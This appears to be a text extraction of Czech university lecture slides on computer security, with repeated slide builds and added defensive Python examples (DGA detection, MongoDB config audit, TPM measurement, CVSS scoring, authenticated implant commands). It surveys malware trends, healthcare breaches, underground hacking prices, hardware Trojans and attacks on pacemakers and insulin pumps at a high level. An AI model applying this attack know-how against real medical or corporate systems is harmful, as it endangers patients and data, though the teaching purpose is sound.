- Botnets, DGA (Domain Generation Algorithm; sometimes FastFlux, 300 s record change)

Page 120: Security in Computer Systems - cvut.cz · Security in Computer Systems Miroslav Burša1 1BEAT Research Group CIIRC CTU in Prague Czech Technical University in Prague 20. bˇrezna

ÚvodModely

Základní útokySecure systems

Záver

OWASP Top TenOWASP Top Ten MobilePrehledPricingVulnerable Medical Devices

Other / Nomenclature

I Evil maid attack, cold boot attackI Scareware, Rogueware, Malware, Adware, Spyware,

Dialer, Keylogger, Phishing attacks (Spear phishing,Waterhole attacks), ...

I Ransomware, CaaS (Crimeware as a S.)I Side channel attacks, timing attacks

I MITM attacks, SSL StrippingI ROP, emulation detectionI Botnets, DGA5

5Domain Generation Algorithm; sometimes FastFlux (300s record change)M. Burša Security

Page 121: Security in Computer Systems - cvut.cz · Security in Computer Systems Miroslav Burša1 1BEAT Research Group CIIRC CTU in Prague Czech Technical University in Prague 20. bˇrezna

ÚvodModely

Základní útokySecure systems

Záver

OWASP Top TenOWASP Top Ten MobilePrehledPricingVulnerable Medical Devices

Other / Nomenclature

I Evil maid attack, cold boot attackI Scareware, Rogueware, Malware, Adware, Spyware,

Dialer, Keylogger, Phishing attacks (Spear phishing,Waterhole attacks), ...

I Ransomware, CaaS (Crimeware as a S.)I Side channel attacks, timing attacksI MITM attacks, SSL Stripping

I ROP, emulation detectionI Botnets, DGA5

5Domain Generation Algorithm; sometimes FastFlux (300s record change)M. Burša Security

Page 122: Security in Computer Systems - cvut.cz · Security in Computer Systems Miroslav Burša1 1BEAT Research Group CIIRC CTU in Prague Czech Technical University in Prague 20. bˇrezna

ÚvodModely

Základní útokySecure systems

Záver

OWASP Top TenOWASP Top Ten MobilePrehledPricingVulnerable Medical Devices

Other / Nomenclature

I Evil maid attack, cold boot attackI Scareware, Rogueware, Malware, Adware, Spyware,

Dialer, Keylogger, Phishing attacks (Spear phishing,Waterhole attacks), ...

I Ransomware, CaaS (Crimeware as a S.)I Side channel attacks, timing attacksI MITM attacks, SSL StrippingI ROP, emulation detection

I Botnets, DGA5

5Domain Generation Algorithm; sometimes FastFlux (300s record change)M. Burša Security

Page 123: Security in Computer Systems - cvut.cz · Security in Computer Systems Miroslav Burša1 1BEAT Research Group CIIRC CTU in Prague Czech Technical University in Prague 20. bˇrezna

ÚvodModely

Základní útokySecure systems

Záver

OWASP Top TenOWASP Top Ten MobilePrehledPricingVulnerable Medical Devices

Other / Nomenclature

I Evil maid attack, cold boot attackI Scareware, Rogueware, Malware, Adware, Spyware,

Dialer, Keylogger, Phishing attacks (Spear phishing,Waterhole attacks), ...

I Ransomware, CaaS (Crimeware as a S.)I Side channel attacks, timing attacksI MITM attacks, SSL StrippingI ROP, emulation detectionI Botnets, DGA5

5Domain Generation Algorithm; sometimes FastFlux (300s record change)M. Burša Security
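The DGA and FastFlux entries above only name the techniques. As an added example that is not part of the slides, the following Python sketch shows the defender's side of both: a resolver log is scanned for names that look algorithmically generated (high entropy, few vowels, digits inside the registrable label) and for record lifetimes at or below the roughly 300 s the footnote gives for FastFlux. The log lines, the thresholds and the naive "label left of the TLD" rule are constructed assumptions for illustration, not values from the slides or from any product.

```python
import math
from collections import Counter

# Constructed sample resolver log, one query per line: "client qname ttl_seconds".
SAMPLE_LOG = """\
10.0.0.5 www.cvut.cz 3600
10.0.0.5 mail.example.org 1800
10.0.0.7 xk3qz9tplw2vbs.net 300
10.0.0.7 q8h1wzrgk7y2.com 290
10.0.0.9 cdn.example-static.com 86400
10.0.0.9 mvw7d2zqkx.biz 60
"""

VOWELS = set("aeiou")
ENTROPY_THRESHOLD = 3.5   # bits per character of the registrable label (assumed threshold)
FASTFLUX_TTL = 300        # the footnote mentions ~300 s record changes for FastFlux


def shannon_entropy(text: str) -> float:
    """Shannon entropy of the string in bits per character."""
    n = len(text)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def registrable_label(qname: str) -> str:
    """Label left of the TLD, e.g. 'cvut' for 'www.cvut.cz' (naive one-label suffix rule)."""
    parts = qname.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def dga_indicators(label: str) -> int:
    """Count of simple lexical indicators that a label looks machine-generated."""
    letters = [ch for ch in label if ch.isalpha()]
    vowel_ratio = sum(ch in VOWELS for ch in letters) / len(letters) if letters else 0.0
    indicators = 0
    if shannon_entropy(label) >= ENTROPY_THRESHOLD:   # many distinct characters
        indicators += 1
    if vowel_ratio < 0.2:                              # unpronounceable
        indicators += 1
    if any(ch.isdigit() for ch in label):              # digits mixed into the name
        indicators += 1
    return indicators


def analyze_log(log_text: str) -> list:
    """One finding per log line with the DGA and FastFlux indicators."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client, qname, ttl = line.split()
        score = dga_indicators(registrable_label(qname))
        findings.append({
            "client": client,
            "qname": qname,
            "dga_indicators": score,
            "suspect_dga": score >= 2,          # two of three indicators: worth a look
            "low_ttl": int(ttl) <= FASTFLUX_TTL,
        })
    return findings


def suspicious_queries(log_text: str) -> list:
    """Query names to report: DGA-looking labels and/or FastFlux-like short TTLs."""
    return [f["qname"] for f in analyze_log(log_text) if f["suspect_dga"] or f["low_ttl"]]


if __name__ == "__main__":
    for finding in analyze_log(SAMPLE_LOG):
        print(finding)
    print("report:", suspicious_queries(SAMPLE_LOG))
```

Lexical scoring of this kind produces false positives on legitimate CDN and tracking hostnames, so in practice it is a triage signal to combine with TTL behaviour, query volume per client and resolution failures (NXDOMAIN bursts), not a verdict on its own.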

Page 124

2015 attack vectors for malware

- .exe files: 30 %
- .zip, .jar: more than 16 %
- MS Office: 9 %, PDF: 7.5 %
- trend: trusted file types: PDF, Flash, MS Office
- Antivirus: signature based: creating unknown malware is easier than ever.
- With nearly 12 million new malware variants being discovered every month, more new malware has been discovered in the past two years than in the previous 29 years combined [6]

[6] in Checkpoint Security Report, 2016

Page 127

Trends...?

Figure: Source: Checkpoint Security Report 2015

Page 128

Trends in Android Malware

Figure: Source: Checkpoint Security Report 2015

- Obfuscation
- Evasion techniques
- Droppers
- Redundancy
- Persistency
- Privilege escalation

Page 134

Android Malware: Trends and Vulnerabilities / Challenges

- System vulnerabilities: over 24,000 types, security patch delays
- Root access and configuration changes: rooting and jailbreaking also serve cybercriminals.
- Repackaged or fake apps
- Trojans and malware: embedded in apps, lack of threat prevention, small screens make spotting differences hard
- MITM attacks: free and public WiFi hotspots

Page 139

Healthcare

- Patient health records: highest value on the black market: 10× more than CC (credit cards); a CC can be reissued easily, a PHR cannot [7]
- 60 % increase in healthcare security incidents
- 21 % of U.S. healthcare organizations do not use disaster recovery technology; 51.7 % of these intend to purchase it in the future
- 19 % of U.S. healthcare organizations report having had a security breach in the last year
- The top 3 perceived threat motivators in the US:
  - 80 % workers snooping on relatives/friends
  - 66 % concerned with financial identity theft
  - 51 % identity theft

[7] in Checkpoint Security Report 2016

Page 147

Major Health Care Data Cyber Attacks

Source: TrapX Security, Inc., 2016

Page 148

Top 10 HealthCare Cyber Attacks of 2016

Company                                   Individuals impacted   Reported
Banner Health                             3,620,000              Aug. 3
Newkirk Products                          3,446,120              Aug. 9
21st Century Oncology                     2,213,597              March 4
Valley Anesthesiology Consultants, Inc.   882,590                Aug. 12
Peachtree Orthopaedic Clinic              531,000                Nov. 18
Central Ohio Urology Group, Inc.          300,000                May 5
Southeast Eye Institute P.A.              87,314                 May 5
Medical Colleagues of Texas, LLP          68,631                 May 11
Urgent Care Clinic of Oxford              64,000                 Sept. 30
Alliance Health Networks, LLC             42,372                 Feb. 15

Source: TrapX Security, Inc., 2016

Page 149

Top 10 HealthCare Cyber Attacks of 2016

#1 Banner Health, 3,620,000
The attack started on systems that process credit cards for food & beverage, then moved laterally to compromise patient health care records on other servers.

#2 Newkirk Products, 3,446,120
A cyber attacker gained access to a server containing important health-plan information.

#3 21st Century Oncology, 2,213,597
Cyberattack on the company's database.

Page 150

Top 10 HealthCare Cyber Attacks of 2016

#4 Valley Anesthesiology Consultants, Inc., 882,590
Attackers gained access to a server containing e-PHI [8]

#5 Peachtree Orthopaedic Clinic, 531,000
Patient database breach.

#6 Central Ohio Urology Group, Inc., 300,000
An unauthorized person posted online files and documents taken from an internal file server.

[8] Personal Health Info

Page 151

Top 10 HealthCare Cyber Attacks of 2016

#7 Southeast Eye Institute P.A., 87,314
Associated business partner: data breach.

#8 Medical Colleagues of Texas, LLP, 68,631
An external entity entered the computer network.

#9 Urgent Care Clinic of Oxford, 64,000
Ransomware attack. Urgent care staff noted that the server was running slowly.

#10 Alliance Health Networks, LLC, 42,372
Patient database accessible via the Internet. Database configuration error (MongoDB).
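Entry #10 attributes the breach to a MongoDB configuration error that left the patient database reachable from the Internet. As an added example (not from the slides or from TrapX), the Python below audits two constructed mongod.conf fragments, one exposed and one hardened, for the two settings that decide this class of incident: net.bindIp / net.bindIpAll (which interfaces the server listens on) and security.authorization (whether clients must authenticate). The minimal parser only handles the two-level subset of YAML used here and is an assumption of this example; the configuration values are constructed.

```python
# Constructed mongod.conf fragments for the audit (not from the slides or from TrapX).
EXPOSED_CONF = """\
# listens on every interface and requires no authentication: the
# "database reachable via the Internet" misconfiguration
net:
  port: 27017
  bindIp: 0.0.0.0
storage:
  dbPath: /var/lib/mongodb
"""

HARDENED_CONF = """\
net:
  port: 27017
  bindIp: 127.0.0.1
security:
  authorization: enabled
storage:
  dbPath: /var/lib/mongodb
"""

LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def parse_simple_yaml(text: str) -> dict:
    """Minimal parser for the 'section:' / '  key: value' subset used above.

    Hypothetical helper for this example only; use a real YAML library in practice.
    """
    config, section = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()   # strip comments and trailing whitespace
        if not line.strip():
            continue
        if not line.startswith(" "):            # top-level section name
            section = line.rstrip(":").strip()
            config[section] = {}
        else:                                   # indented "key: value" inside the section
            key, _, value = line.strip().partition(":")
            config[section][key.strip()] = value.strip()
    return config


def audit_mongod_conf(text: str) -> list:
    """Return findings (an empty list means nothing to report) for exposure and auth."""
    cfg = parse_simple_yaml(text)
    net = cfg.get("net", {})
    security = cfg.get("security", {})
    findings = []

    bind_all = net.get("bindIpAll", "false").lower() == "true"
    if "bindIp" in net:
        addresses = [a.strip() for a in net["bindIp"].split(",")]
    else:
        addresses = []
        # mongod releases before 3.6 listened on all interfaces when bindIp was unset
        findings.append("net.bindIp not set explicitly")
    external = bind_all or any(a not in LOOPBACK for a in addresses)
    if external:
        findings.append("mongod reachable beyond loopback: " + (", ".join(addresses) or "bindIpAll"))

    auth_enabled = security.get("authorization", "disabled").lower() == "enabled"
    if not auth_enabled:
        findings.append("security.authorization is not 'enabled'")

    if (external or "bindIp" not in net) and not auth_enabled:
        findings.append("CRITICAL: database may be reachable from the network without authentication")
    return findings


if __name__ == "__main__":
    print("exposed :", audit_mongod_conf(EXPOSED_CONF))
    print("hardened:", audit_mongod_conf(HARDENED_CONF))
```

Binding to loopback is the right default for a database that only its own application servers should reach; where remote clients are genuinely needed, the bound address should be a private interface, authorization must be enabled and the port should additionally be filtered at the host and network firewall.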

Page 152

HW Attacks: x86 architecture

- Can the TPM [9] really be trusted? C. Bowden: Anything that is "trusted" is a potentially lethal enemy of any secure system
- Can the (firmware of the) BIOS/UEFI and the SMM [10], GPU/NIC/SATA/HDD/EC [11] be trusted...?
- BIOS/UEFI loads as the first code → it can affect every image loaded after it
- The peripherals: HW, firmware and OS drivers and stack: outside of the TCB [12]

J. Rutkowska, Intel x86 considered harmful, Oct. 2015

[9] Trusted/Trusted(?) Platform Module
[10] System Management Mode: LightEater rootkit, PoC
[11] Embedded Controller
[12] Trusted Computing Base

Page 156

HW Attacks: x86 architecture: Secure(?) BIOS/UEFI

How can the BIOS become malicious?
- Backdoored (malicious) by the vendor
- Somebody able to modify the BIOS later: lacking reflashing protection, exploiting flaws in the BIOS and reflashing before SMM [13] locks are applied
- SPI programming interface (physical attack)

J. Rutkowska, Intel x86 considered harmful, Oct. 2015

[13] System Management Mode

Page 159

HW Attacks: x86 architecture

TPM problems
- Maintaining a long chain of trust
- Need to anchor the chain at some trusted piece of code, somewhere at the very beginning of the platform life cycle (CRTM, Core Root of Trust for Measurement)
- This must be ROM
- ...but it is implemented within the BIOS (SPI flash memory)

J. Rutkowska, Intel x86 considered harmful, Oct. 2015
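To make the chain-of-trust point concrete, here is an added Python simulation, not from the slides or from Rutkowska's paper, of how a TPM platform configuration register (PCR) is extended stage by stage, PCR_new = SHA-256(PCR_old || H(image)). It shows that an implanted kernel image changes the final PCR as long as the measuring code is honest, but that a replaced measurer at the root of the chain (the CRTM sitting in writable SPI flash) can replay the golden digests and produce the expected PCR regardless of what was actually loaded, which is exactly why the root must be immutable. The stage images are constructed byte strings, and the simplified model (one PCR, SHA-256 bank, no signed quote) is an assumption of the example.

```python
import hashlib

# Constructed stand-ins for the boot-stage images (not from the slides).
BOOT_STAGES = [
    ("CRTM", b"crtm-v1: first code to run, measures the BIOS"),
    ("BIOS/UEFI", b"bios-v1: measures the bootloader"),
    ("bootloader", b"bootloader-v1: measures the kernel"),
    ("kernel", b"kernel-v1"),
]
ZERO_PCR = bytes(32)  # PCRs of the SHA-256 bank start as all-zero after reset


def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


def extend(pcr: bytes, measurement: bytes) -> bytes:
    """TPM PCR extend: PCR_new = H(PCR_old || measurement); one-way and order-dependent."""
    return sha256(pcr + measurement)


def measure_chain(images, reported_digests=None) -> bytes:
    """Extend one PCR over each stage image in boot order.

    An honest measurer hashes the image it is about to hand control to.
    reported_digests models a dishonest measurer at the root of the chain: it
    extends whatever digests it chooses to report instead of hashing the images.
    """
    pcr = ZERO_PCR
    if reported_digests is None:
        reported_digests = [sha256(img) for img in images]
    for digest in reported_digests:
        pcr = extend(pcr, digest)
    return pcr


def attest(pcr: bytes, golden_pcr: bytes) -> bool:
    """Remote attestation check: does the reported PCR equal the known-good value?"""
    return pcr == golden_pcr


def golden_values():
    """Reference images, their digests and the expected PCR of a clean boot."""
    images = [img for _, img in BOOT_STAGES]
    return images, [sha256(img) for img in images], measure_chain(images)


def tampered_kernel_detected() -> bool:
    """Honest CRTM, implanted kernel: the PCR changes and attestation fails."""
    images, _, golden_pcr = golden_values()
    tampered = images[:-1] + [images[-1] + b" + implant"]
    return not attest(measure_chain(tampered), golden_pcr)


def replaced_crtm_detected() -> bool:
    """Implanted kernel AND a replaced CRTM that replays the golden digests:
    attestation passes although the platform is compromised."""
    images, golden_digests, golden_pcr = golden_values()
    tampered = images[:-1] + [images[-1] + b" + implant"]
    return not attest(measure_chain(tampered, reported_digests=golden_digests), golden_pcr)


if __name__ == "__main__":
    print("implanted kernel, honest root, detected:  ", tampered_kernel_detected())  # True
    print("implanted kernel, replaced root, detected:", replaced_crtm_detected())    # False
```

The second case is the slide's argument in code: every later measurement is only as trustworthy as the code that took the first one, so a CRTM that lives in reflashable memory turns the whole measured-boot log into a claim rather than evidence. Hardware-enforced roots (immutable boot ROM, or a verified-boot check of the flash before the CRTM runs) exist precisely to close that gap.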

Page 163: Security in Computer Systems - cvut.cz · Security in Computer Systems Miroslav Burša1 1BEAT Research Group CIIRC CTU in Prague Czech Technical University in Prague 20. bˇrezna

ÚvodModely

Základní útokySecure systems

Záver

OWASP Top TenOWASP Top Ten MobilePrehledPricingVulnerable Medical Devices

HW Attacks: (Pre)fabrication Attacks

Figure: IC design: threat vectors (red), 3rd party in control (blue)


Threat model:
- Dopant-level Trojans: short-circuit of victim transistors (no added/removed gates/wires); hard to detect during physical inspection, better detected by post-fabrication functional testing
- Inserted malicious circuitry; protection:
  - side channel (anomaly detection)
  - add sensors (propagation delay, ...)
- Yang, Hicks: single-gate prefabrication attack...
- ...triggered by a specific sequence of instructions (fast toggling of one signal) → needs to be stealthy so it is not discoverable by common tests/benchmarks

K. Yang, M. Hicks et al. A2: Analog Malicious Hardware, 2016


Figure: Charge pump

K. Yang, M. Hicks et al. A2: Analog Malicious Hardware, 2016


Figure: Attack triggering

K. Yang, M. Hicks et al. A2: Analog Malicious Hardware, 2016


Botnet pricing, Feb 2013

Mix / No. of bots       1000      5000     10 000
World mix             25 USD   110 USD    200 USD
European mix          50 USD   225 USD    400 USD
Germany, Canada, GB   80 USD   350 USD    600 USD
US                   120 USD   550 USD   1000 USD

http://blog.webroot.com/2013/02/28/how-much-does-it-cost-to-buy-10000-u-s-based-malware-infected-hosts/


Attack pricing, Nov 2012

Botnet / hour                         2 USD
Botnet (2000)                       185 USD
Spying SMS (trojan)                 350 USD
SMS spam (1 million addresses)       10 USD
Hack Gmail account                  150 USD
Hack Twitter account                120 USD
Hack Facebook account               120 USD
DDoS attack                     28 – 65 USD
Corporate e-mail attack             500 USD

http://www.gizmodo.co.uk/2012/11/how-much-does-it-cost-to-hire-a-botnet-or-hack-a-facebook-account/


Get a better price with good marketing...

Figure: Source: pinterest.com/itpie/it-jokes/


Other / Nomenclature

- Evil maid attack, cold boot attack
- Scareware, rogueware, malware, adware, phishing attacks, ...
- Botnets
- MITM attacks, SSL stripping
- ATM skimming (video), credit card fraud


Phishing fraud form

Figure: Have your card verified ;)


Other / Nomenclature

- IoT → IoST, IoUT


GAO to FDA

GAO, Medical Devices: FDA Should Expand Its Consideration of Information Security for Certain Types of Devices, August 2012

GAO: US Government Accounting Office; FDA: US Food and Drug Administration


GAO to FDA

Threats for active (powered) devices:
- Unintentional
  - Defective SW and FW
  - EMG interference
- Intentional
  - Unauthorized access (altering signals)
  - Malware
  - DoS attack (battery depletion)

http://www.gao.gov/assets/650/647767.pdf


Vulnerable cardiac device

Target: implantable cardiac devices and pacemakers [2008]
- turning off
- issuing life-threatening electric shocks

Figure: Pacemaker [SCOTT CAMAZINE / GETTY IMAGES]
http://healthland.time.com/2012/10/22/wireless-medical-devices-vulnerable-to-hacking/


Vulnerable insulin pump

Target: insulin pump [2011]
- scan for serial no.
- increase insulin dosage
- disable warning mechanism

Figure: Insulin pump
http://www.theregister.co.uk/2011/10/27/fatal_insulin_pump_attack


GAO: Key control areas

- SW testing, verification and validation
- Risk assessments
- Risk management
- Access control
- Vulnerability and patch management
- Technical audit and accountability
- Security-incident response
- Contingency planning


GAO: Key vulnerabilities

- Limited battery capacity
- Remote access
- Unencrypted data transfer
- Untested SW and FW
- Susceptibility to (EMG) interference
- Limited (nonexistent) authentication process and authorization procedures
- Disabling of warning mechanism
- Design based on older technologies
- Inability to update or install security patches


GAO: Key information security risks

- Unauthorized change of device settings
- Unauthorized change to or disabling of therapies
- Loss or disclosure of sensitive data
- Device malfunction


FDA: Efforts

- Postmarket efforts
- MAUDE (adverse event reporting system)
- Postmarket studies conducted by manufacturers
- Manufacturers have to prepare annual reports


S. Erven, M. Collao: Medical Devices: Pwnage and Honeypots

S. Erven, M. Collao, Medical Devices: Pwnage and Honeypots, https://youtu.be/qX_dV6LUTdo, September 2015


Phase 1 Research: Device vulnerabilities

Problem: mostly XP
- Weak default/hardcoded administrative credentials
  - Treatment modification
  - Cannot attribute action to individual
- Known SW vulnerabilities in existing and new devices
  - Reliability and stability issues
  - Increased deployment cost to preserve patient safety
- Unencrypted data transmission and service authorization flaws
  - Healthcare record privacy and integrity
  - Treatment modification


Phase 2 Research: Network discovery

Problem: misconfiguration in network
- Open SMB server
- Leaking network information (not only med.)
- Found hundreds of exposed 3rd-party healthcare devices: Anesthesia: 21, Cardiology: 488, Infusion: 133, MRI: 97, PACS: 323, Nuclear med: 67, Pacemaker: 31
- These used credentials...
- ...however quite poor ones
- Knowing IP/username/office no.: physical attack feasible: data extrusion, phishing (Win XP), unlimited attempts for pwd
- Win XP: MS08-067 vulnerability


Microsoft Security Bulletin MS08-067 – Critical

Vulnerability in Server Service Could Allow Remote Code Execution (958644)
Published: October 23, 2008, Version: 1.0

This security update resolves a privately reported vulnerability in the Server service. The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit. Firewall best practices and standard default firewall configurations can help protect network resources from attacks that originate outside the enterprise perimeter.

- CVE-2008-4250


Vulnerability Summary for CVE-2008-4250

Original release date: 10/23/2008, Last revised: 10/30/2012, Source: US-CERT/NIST

Overview: The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization, as exploited in the wild by Gimmiv.A in October 2008, aka "Server Service Vulnerability."

Impact

CVSS v2 Base Score        10.0 HIGH
Impact Subscore           10.0
Exploitability Subscore   10.0
Access Vector             Network exploitable
Access Complexity         Low
Authentication            Not required to exploit

Impact Type: Provides administrator access; allows complete confidentiality, integrity, and availability violation; allows unauthorized disclosure of information; allows disruption of service
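How the three 10.0 figures in the table arise, as an added example (not part of the slides or the NVD entry): the CVSS v2 base-score formulas from the specification applied to the vector the summary implies (network access, low complexity, no authentication, complete C/I/A impact), plus a constructed local/partial-impact vector for contrast.

```python
# CVSS v2 base metric weights, as defined in the CVSS v2 specification.
ACCESS_VECTOR = {"L": 0.395, "A": 0.646, "N": 1.0}     # Local / Adjacent / Network
ACCESS_COMPLEXITY = {"H": 0.35, "M": 0.61, "L": 0.71}  # High / Medium / Low
AUTHENTICATION = {"M": 0.45, "S": 0.56, "N": 0.704}    # Multiple / Single / None
CIA_IMPACT = {"N": 0.0, "P": 0.275, "C": 0.660}        # None / Partial / Complete

# Vector derived from the NVD table above (AV:N, AC:L, Au:N, complete C/I/A).
CVE_2008_4250_VECTOR = "AV:N/AC:L/Au:N/C:C/I:C/A:C"


def parse_vector(vector: str) -> dict:
    """Parse 'AV:N/AC:L/...' into a dict and reject malformed vectors."""
    parts = dict(p.split(":", 1) for p in vector.split("/"))
    if set(parts) != {"AV", "AC", "Au", "C", "I", "A"}:
        raise ValueError(f"malformed CVSS v2 base vector: {vector}")
    return parts


def cvss2_base(vector: str):
    """Return (base score, impact subscore, exploitability subscore),
    each rounded to one decimal as NVD displays them."""
    v = parse_vector(vector)
    c, i, a = CIA_IMPACT[v["C"]], CIA_IMPACT[v["I"]], CIA_IMPACT[v["A"]]
    impact = 10.41 * (1 - (1 - c) * (1 - i) * (1 - a))
    exploitability = 20 * ACCESS_VECTOR[v["AV"]] * ACCESS_COMPLEXITY[v["AC"]] * AUTHENTICATION[v["Au"]]
    f_impact = 0 if impact == 0 else 1.176
    base = ((0.6 * impact) + (0.4 * exploitability) - 1.5) * f_impact
    return round(base, 1), round(impact, 1), round(exploitability, 1)


def severity(base_score: float) -> str:
    """NVD's v2 severity bands: Low 0.0-3.9, Medium 4.0-6.9, High 7.0-10.0."""
    if base_score >= 7.0:
        return "HIGH"
    if base_score >= 4.0:
        return "MEDIUM"
    return "LOW"


if __name__ == "__main__":
    for vec in (CVE_2008_4250_VECTOR, "AV:L/AC:L/Au:N/C:P/I:P/A:P"):
        base, imp, expl = cvss2_base(vec)
        print(f"{vec}: base {base} {severity(base)}, impact {imp}, exploitability {expl}")
```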


Phase 3 Research: Admin access

Problem: default/hardcoded credentials
- GE quickly responded...
- ...(after research) that creds are not hardcoded, but default only...
- ...however about 30 CVEs (Common Vulnerabilities and Exposures) up to 2006 proved them wrong: nuclear img, CT, cardiology, archiving, analytics, audit, PACS, X-ray...
- around 2014 started to use SSL (encryption)


Phase 3 Research: Admin access

Figure: Source: slideshare: medical-devices-passwords-to-pwnage


Figure: Effective password policy


Phase 3 Research: Admin access

Problems:
- Documentation: in some cases: do not change, pwd reset not allowed
- Documentation: do not change pwd or we won't support you.
- Documentation not updated about how to change default creds. Secure config guides lacking.
- Support personnel often rely on implementation doc; these logins are heavily utilized...


Phase 4 Research: Honeypotting
- Mimic medical device external presence: services, connection strings, web frontends
- Replicate existing vulnerabilities: OS (MS08-067), app level (Telnet RCE, VNC), default creds (SSH, Web)
- Results with 10 honeypots
  - Successful logins: 55,416
  - Successful exploits: 24
  - Dropped malware samples: 209
  - Top 3 src countries: Netherlands, China, Korea
  - HoneyCreds login: 8
- Problem: usually talks to C&C server

Outcome: devices compromised by unintended attacks


Conclusion
- Medical devices are increasingly accessible due to the nature of healthcare
- HIPAA (Health Insurance Portability and Accountability Act) focuses on patient privacy, not patient safety
- FDA does not validate cyber safety controls
- Malicious intent is not a prerequisite for adverse patient outcomes
- Scan your biomedical environment for default credentials
- Report identified issues to manufacturer for remediation

Summary of current state:


Current state summary
- FDA receives several hundred thousand reports of patient safety issues per year
- Cyber safety investigations hampered by evidence capture capabilities
- New devices are coming to market with long-known defects
- Existing devices are not consistently maintained and updated

Recommended treatment summary
- Patient safety as the overriding objective
- Avoid failed practices and iteratively evolve better ones
- Engage internal and external stakeholders
- Safety into existing practices and governance


2016 Marin, Singelee, et al.

On the (in)security of the latest generation implantable cardiac defibrillators and how to secure them

- Weak adversary, cheap setup
- Devices: short- and long-range communication channels
- Able to fully reverse-engineer the protocols
- Vulnerabilities:
  - Privacy attacks (only LFSR (Linear Feedback Shift Register) obfuscation)
  - DoS attacks (remained in standby for 5 min instead of going to sleep). Can be activated via the long-range comm channel.
  - Spoofing and replay attacks. No integrity nor authenticity checks of the msg.


- Countermeasures:
  - Jamming the wireless channel.
  - Adding a 'shutdown' command (dev goes to sleep mode directly)
  - Key agreement protocol (master key in HW; might be a risk (!) if revealed). Authors propose a semi-offline protocol (devs must be ensured to operate even in an offline environment)
  - Differentiate between device programmers and base stations
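What the missing integrity and authenticity checks on the previous slide and the 'shutdown' countermeasure here look like in code, as an added example (not the paper's protocol and not from the slides): a minimal authenticated, replay-protected command channel between a programmer and an implant. It assumes a symmetric key already shared by a key-agreement step such as the one the authors propose; the key, command codes and message layout are constructed for the example.

```python
import hashlib
import hmac
import struct

DEMO_KEY = b"constructed-demo-key-not-for-use"  # placeholder shared key, assumed agreed earlier

CMD_READ_TELEMETRY = 0x01   # constructed command codes
CMD_SHUTDOWN = 0x02         # explicit 'go to sleep now', the countermeasure above

HEADER_LEN = 5              # 4-byte counter + 1-byte command
TAG_LEN = 32                # HMAC-SHA256


def build_command(key: bytes, counter: int, cmd: int) -> bytes:
    """Programmer side: header = big-endian counter || command byte, followed
    by an HMAC-SHA256 tag over the header. The counter must strictly increase
    (and persist across programmer and implant resets)."""
    header = struct.pack(">IB", counter, cmd)
    tag = hmac.new(key, header, hashlib.sha256).digest()
    return header + tag


class Implant:
    """Implant side: verify the tag first (integrity + authenticity), then the
    counter (freshness against replay), and only then act on the command."""

    def __init__(self, key: bytes):
        self._key = key
        self._last_counter = 0
        self.state = "awake"

    def handle(self, msg: bytes) -> str:
        if len(msg) != HEADER_LEN + TAG_LEN:
            return "rejected: malformed"
        header, tag = msg[:HEADER_LEN], msg[HEADER_LEN:]
        expected = hmac.new(self._key, header, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):   # constant-time comparison
            return "rejected: bad tag"               # spoofed or tampered message
        counter, cmd = struct.unpack(">IB", header)
        if counter <= self._last_counter:
            return "rejected: replay"                # a previously seen message
        self._last_counter = counter
        if cmd == CMD_READ_TELEMETRY:
            return "ok: telemetry"
        if cmd == CMD_SHUTDOWN:
            self.state = "asleep"                    # no 5-minute standby window
            return "ok: shutdown"
        return "rejected: unknown command"


def run_scenario() -> list:
    """Exercise the checks with constructed messages; returns the implant's verdicts."""
    implant = Implant(DEMO_KEY)
    results = []
    m1 = build_command(DEMO_KEY, 1, CMD_READ_TELEMETRY)
    results.append(implant.handle(m1))                                   # genuine, fresh
    results.append(implant.handle(m1))                                   # same bytes again
    altered = m1[:4] + bytes([CMD_SHUTDOWN]) + m1[HEADER_LEN:]           # command byte changed, old tag kept
    results.append(implant.handle(altered))
    results.append(implant.handle(build_command(b"wrong-key", 2, CMD_SHUTDOWN)))  # no shared key
    results.append(implant.handle(build_command(DEMO_KEY, 2, CMD_SHUTDOWN)))      # genuine shutdown
    results.append(implant.state)
    return results


if __name__ == "__main__":
    for line in run_scenario():
        print(line)
```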


Secure systems

- Automated theorem proving (mathematical proofs)
- Simple microkernels
- Modular microkernels (a bug affects only the corresponding module, Hurd)
- Cryptography
- Cryptographic processors
- Strong (system) authentication methods
- Chain of trust
- Mandatory access control (removing a user terminates all of their processes)
- Capability and Access Control List


Secure systems

- Do not use applications with known vulnerabilities (0-day attacks, worms)
- Backups
- Antivirus software
- Firewall
- Identity verification system (passwords, smart cards, biometrics, ...)
- Encryption (PKI)
- IDS (passive or reactive)
  - network-, user-, application-, host- or application-protocol-based; IPS; artificial immune system
- User awareness of social engineering

Page 209

Always back up!

Figure: Source: pinterest.com/itpie/it-jokes/

Page 210

Best practices for business, ISTR Symantec 2014

1. Employ defense-in-depth strategies
2. Monitor for network incursion attempts, vulnerabilities, and brand abuse
3. Antivirus on endpoints is not enough
4. Secure your websites against MITM attacks and malware infection
5. Protect your private keys
6. Use encryption to protect sensitive data
7. Ensure all devices allowed on company networks have adequate security protections

Page 211

Best practices for business, ISTR Symantec 2014 (continued)

8. Implement a removable media policy
9. Be aggressive in your updating and patching
10. Enforce an effective password policy
11. Ensure regular backups are available
12. Restrict email attachments
13. Ensure that you have infection and incident response procedures in place
14. Educate users on basic security protocols

Page 212

Best practices for consumers, ISTR Symantec 2014

1. Protect yourself
2. Update regularly
3. Be wary of scareware tactics
4. Use an effective password policy
5. Think before you click
6. Guard your personal data

Page 213

Top ten for business, Ken Hess, 2013

1. Encrypt your data

2. Use digital certificates

3. Implement DLP [21] and auditing

4. Implement a removable media policy

5. Secure websites against MITM and malware infections

6. Use a spam filter on email servers

7. Use a comprehensive endpoint security solution

8. Network-based security hardware and software

